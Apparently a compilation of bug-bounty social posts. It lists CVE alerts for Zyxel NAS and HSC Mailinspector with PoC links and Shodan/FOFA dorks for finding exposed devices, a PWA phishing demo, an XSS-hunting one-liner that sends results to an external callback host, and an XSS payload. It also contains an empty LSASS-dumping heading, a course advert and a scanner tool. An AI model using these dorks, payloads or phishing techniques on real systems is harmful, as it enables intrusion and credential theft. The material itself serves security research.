⚠️CVE-2024-29973: Unauthorized command injection in Zyxel NAS devices⚠️

🔍This command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted HTTP POST request.

📌PoC: https://github.com/k3lpi3b4nsh33/CVE-2024-29973

📣Dorks:
🔽Hunter: product.name="ZyXEL NAS542"||http://product.name="ZyXEL NAS326"
🔼FOFA: app="NAS542" || app="ZYXEL-NAS326"
🔽SHODAN: http.noscript:"Zyxel NAS326"

⚠️Progressive Web App (PWA) Phishing⚠️

📌Attack Scenario: A user lands on index.html and clicks the "Install Microsoft Application" button. The install app prompt appears and once it is installed by the user, the JavaScript embedded in index.html redirects the PWA window to the phishing page that hase a fake URL bar at the top (i.e. mrd0x.html). Ensure that you're testing this over HTTPS to avoid encountering issues.

📣Blog Link: https://mrd0x.com/progressive-web-apps-pwa-phishing

🔗POC: https://github.com/mrd0x/PWA-Phishing

⚠️This is simply to demonstrate how PWA phishing works. Don't use it for illegal purposes.

🔼 One-Liner XSS 🔽

subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|noscript|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter

💥Methods for Dump LSASS💥

☄️KnoXSS XSS Payload - confirm?.(1)
🔍Credit- @lu3ky13

#bugbounty #bugbountytips

👀Top 1% on TryHackMe? That’s Cute👀

🤡I've seen a lot of posts lately celebrating being in the top 1% on TryHackMe, but let's take a step back. While it's great to challenge yourself with these platforms, does ranking highly truly reflect practical, real-world experience?

🙂In the ever-evolving field of cybersecurity, hands-on experience and the ability to adapt to real-world situations are what truly count. Ranking in the top 1% on a practice platform like TryHackMe is commendable, but it shouldn't be confused with actual industry experience.

✉️Thoughts?

☄️CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!

📣An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

🚫PoC: https://lnkd.in/gK4NHJ4C
⛔️Video POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share

🌐Dorks:
Hunter: web.noscript=="..:: HSC MailInspector ::.."
FOFA: noscript=="..:: HSC MailInspector ::.."

💥 Registration Open for July Batch: Extreme Web Application Penetration Testing 💥

⚠️Slots Remaining 4

💯Registration Link: https://lnkd.in/g7MjfrXG

Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!

🖥 Starts: July Mid, 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
🔗 Course Module: https://lnkd.in/gfZbBCFn

☄️Sharpen your skills for the Certified Ethical Hacker v12 exam with these practice questions☄️

🔫Smap - passive Nmap like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.

🤨 Read more: https://github.com/s0md3v/Smap

😐#infosec #cybersecurity #hacking #pentesting #security